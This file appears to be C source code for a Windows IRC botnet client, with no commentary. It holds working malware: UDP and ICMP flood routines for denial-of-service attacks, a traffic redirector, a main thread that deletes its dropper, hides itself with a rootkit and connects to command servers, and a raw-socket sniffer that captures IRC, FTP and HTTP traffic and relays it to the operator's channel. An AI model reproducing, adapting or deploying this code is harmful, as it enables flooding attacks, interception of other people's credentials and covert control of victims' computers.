// function for sending udp packets
DWORD WINAPI udp(LPVOID param)
{
PINGFLOOD udp = *((PINGFLOOD *)param);
PINGFLOOD *udps = (PINGFLOOD *)param;
udps->gotinfo = TRUE;
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
int i;
srand(GetTickCount());
SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(udp.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(udp.host);
if (hostent == NULL && iaddr.s_addr == INADDR_NONE) {
sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(1);
}
ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr));
ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port)));
if (udp.port < 1)
udp.port = 1;
if (udp.port > MAXUDPPORT)
udp.port = MAXUDPPORT;
udp.num = udp.num / 10;
if (udp.delay == 0)
udp.delay = 1;
for (i = 0; i < udp.size; i++)
pbuff[i] = (char)(rand() % 255);
while (udp.num-- > 0) {
//change port every 10 packets (if one isn't specified)
for (i = 0; i < 11; i++) {
fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin));
Sleep(udp.delay);
}
if (udp.port == 0)
ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1));
}
sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(0);
}
SOCKET CreateSock(char *host, unsigned short port)
{
SOCKET ssock;
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return INVALID_SOCKET;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(port);
IN_ADDR in;
in.s_addr = finet_addr(host);
LPHOSTENT Hostent = NULL;
if (in.s_addr == INADDR_NONE)
Hostent = fgethostbyname(host); //hostname
if (Hostent == NULL && in.s_addr == INADDR_NONE) //error dns
return INVALID_SOCKET;
ssin.sin_addr = ((Hostent != NULL)?(*((LPIN_ADDR)*Hostent->h_addr_list)):(in));
if (fconnect(ssock, (LPSOCKADDR) &ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
return INVALID_SOCKET;
}
return (ssock);
}
// function for sending pings
DWORD WINAPI ping(LPVOID param)
{
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
unsigned long ip;
PINGFLOOD ping = *((PINGFLOOD *)param);
PINGFLOOD *pings = (PINGFLOOD *)param;
pings->gotinfo = TRUE;
HANDLE icmp = (HANDLE)fIcmpCreateFile();
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(ping.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(ping.host);
if ((hostent == NULL && iaddr.s_addr == INADDR_NONE) || icmp == INVALID_HANDLE_VALUE) {
sprintf(sendbuf,"[PING]: Error sending pings to %s.", ping.host);
if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
addlog(sendbuf);
clearthread(ping.threadnum);
ExitThread(1);
}
if (hostent != NULL)
ip = *(DWORD*)*hostent->h_addr_list;
else
ip = iaddr.s_addr;
ICMP_ECHO_REPLY reply;
memset(&reply, 0, sizeof(reply));
reply.RoundTripTime = 0xffffffff;
if (ping.size > MAXPINGSIZE)
ping.size = MAXPINGSIZE;
if (ping.delay < 1)
ping.delay = 1;
for (int i = 0; i < ping.num; i++)
fIcmpSendEcho(icmp, ip, pbuff, ping.size, NULL, &reply, sizeof(ICMP_ECHO_REPLY), ping.delay);
fIcmpCloseHandle(icmp);
sprintf(sendbuf,"[PING]: Finished sending pings to %s.", ping.host);
if (!ping.silent) irc_privmsg(ping.sock, ping.chan, sendbuf, ping.notice);
addlog(sendbuf);
clearthread(ping.threadnum);
ExitThread(0);
}
DWORD WINAPI Bthd(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(xetum=CreateMutex(NULL, FALSE, xetumhandle)))
Sleep(5000);
else
break;
}
if (WaitForSingleObject(CreateMutex(NULL, TRUE, xetumhandle), 30000) == WAIT_TIMEOUT)
ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
srand(GetTickCount());
dwstarted=GetTickCount();
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
int i=0;
DWORD id=0;
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",sinfo[curserver].host,sinfo[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(sinfo[curserver].host,sinfo[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),sinfo[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(srvsz-1))
curserver=0;
else
curserver++;
}
// cleanup;
//killthreadall();
fWSACleanup();
ReleaseMutex(xetum);
ExitThread(0);
return TRUE;
}
// part of the redirect function, handles sending/recieving for the remote connection.
DWORD WINAPI RedirectLoopThread(LPVOID param)
{
REDIRECT redirect = *((REDIRECT *)param);
REDIRECT *redirectp = (REDIRECT *)param;
redirectp->gotinfo = TRUE;
int threadnum=redirect.cthreadnum;
char sendbuf[IRCLINE], buff[4096];
int err;
DWORD id;
SOCKET ssock;
do {
if ((ssock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) break;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(redirect.port);
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(redirect.dest);
LPHOSTENT hostent;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(redirect.dest);
else
hostent = fgethostbyaddr((const char *)&iaddr, sizeof(iaddr), AF_INET);
if (hostent == NULL) break;
ssin.sin_addr = *((LPIN_ADDR)*hostent->h_addr_list);
if ((err = fconnect(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) break;
redirect.cgotinfo = FALSE;
sprintf(sendbuf,"[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.", finet_ntoa(ssin.sin_addr), ssin.sin_port, redirect.threadnum);
redirect.cthreadnum = addthread(sendbuf,REDIRECT_THREAD,ssock);
threads[redirect.cthreadnum].parent = redirect.threadnum;
threads[redirect.cthreadnum].csock = threads[threadnum].sock;
if (threads[redirect.cthreadnum].tHandle = CreateThread(NULL,0,&RedirectLoop2Thread,(LPVOID)&redirect,0,&id)) {
while (redirect.cgotinfo == FALSE)
Sleep(50);
} else {
addlogv("[REDIRECT]: Failed to start connection thread, error: <%d>.", GetLastError());
break;
}
while (1) {
memset(buff, 0, sizeof(buff));
if ((err = frecv(threads[threadnum].sock, buff, sizeof(buff), 0)) <= 0) break;
if ((err = fsend(ssock, buff, err, 0)) == SOCKET_ERROR) break;
}
break;
} while (1);
fclosesocket(threads[threadnum].sock);
fclosesocket(ssock);
clearthread(threadnum);
ExitThread(0);
}
DWORD WINAPI BotThread(LPVOID param)
{
for (int m=0;m<6;m++)
{
if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle)))
Sleep(5000);
else
break;
}
// if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT)
// ExitProcess(0);
addthread(MAIN_THREAD,str_main_thread,main_title);
#ifndef _DEBUG
#ifndef NO_MELT
char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name);
if (melt)
{
SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL);
int tries=0;
while (FileExists(melt) && tries<3)
{
DeleteFile(melt);
tries++;
Sleep(2000);
}
RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name);
}
#endif // NO_MELT
#endif // _DEBUG
srand(GetTickCount());
dwstarted=GetTickCount();
#ifndef NO_VERSION_REPLY
curversion=rand()%(versionsize);
#ifdef _DEBUG
printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]);
#endif
#endif
WSADATA wsadata;
if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0)
ExitProcess(-2);
#ifndef _DEBUG
#ifndef NO_FCONNECT
char readbuf[1024];
HINTERNET httpopen, openurl;
DWORD read;
httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL);
if (!openurl)
{
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
}
fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read);
fInternetCloseHandle(httpopen);
fInternetCloseHandle(openurl);
#endif // NO_FCONNECT
#endif // _DEBUG
#ifndef NO_INSTALLED_TIME
if (!noadvapi32)
GetInstalledTime();
else
sprintf(installedt,"Error");
#endif // NO_INSTALLED_TIME
int i=0;
DWORD id=0;
#ifndef NO_RECORD_UPTIME
i=addthread(RUPTIME_THREAD,str_rup_thread,main_title);
threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id);
#endif // NO_RECORD_UPTIME
#ifndef NO_AUTO_SECURE
#ifndef NO_SECURE
NTHREAD secure;
secure.bdata2=TRUE;//loop
i=addthread(SECURE_THREAD,str_asecure_thread,sec_title);
threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id);
#endif
#endif // NO_AUTO_SECURE
#ifndef NO_RDRIV
#ifndef _DEBUG
rkenabled=InitRK();//initialize fu
if (rkenabled)
HideMe();//hide the process
#endif // _DEBUG
#endif // NO_RDRIV
#ifndef _DEBUG // maybe this will give the shutdown handler time to work
RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000");
#endif
//get internal ip
char *ip;
char hostname[256];
struct hostent *h;
fgethostname(hostname, 256);
h = fgethostbyname(hostname);
ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]);
strncpy(inip,ip,sizeof(inip));
curserver=0;
HookProtocol(&mainirc);
while (mainirc.should_connect()) {
if (!mainirc.is_connected())
{
#ifdef _DEBUG
printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port);
#endif
#ifndef NO_FLUSHDNS
FlushDNSCache();
#endif
mainirc.start(servers[curserver].host,servers[curserver].port,
mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN),
mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass);
mainirc.message_loop();
}
else
mainirc.message_loop();
Sleep(SFLOOD_DELAY);
if (curserver==(serversize-1))
curserver=0;
else
curserver++;
}
// cleanup;
killthreadall();
fWSACleanup();
ReleaseMutex(mutex);
ExitThread(0);
}
DWORD WINAPI SnifferThread(LPVOID param) {
SNIFFER sniff = *((SNIFFER *)param);
SNIFFER *sniffs = (SNIFFER *)param;
sniffs->gotinfo = TRUE;
char sendbuf[IRCLINE];
int sock; sockaddr_in addr_in; hostent *hEnt;
IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket;
char szName[255]={0}; unsigned long lLocalIp;
addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0;
fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName);
memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length);
addr_in.sin_addr.s_addr=lLocalIp;
sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP);
if(sock==INVALID_SOCKET) return NULL;
if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) {
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
int optval=1; DWORD dwBytesRet;
if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR)
{
sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError());
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
addlog(sendbuf);
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
}
char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead;
while(1)
{
// Clear the buffer
memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0;
// Read the raw packet
iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0);
// Process if its a TCP/IP packet
if(ipHeader->proto==6)
{ tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader));
int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048];
iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport);
if(iSrcPort !=110 && iSrcPort!=25 &&
iDestPort !=110 && iDestPort!=25)
{
sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP)));
sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP)));
szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader));
for(int i=0; i<(int)strlen(szPacket); i++) {
if(szPacket[i]=='\r') szPacket[i]='\x20';
if(szPacket[i]=='\n') szPacket[i]='\x20'; }
if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousHTTP(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
else if(IsSuspiciousVULN(szPacket))
{
_snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket);
if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
}
}
}
}
fclosesocket(sock);
clearthread(sniff.threadnum);
ExitThread(0);
return 0;
}
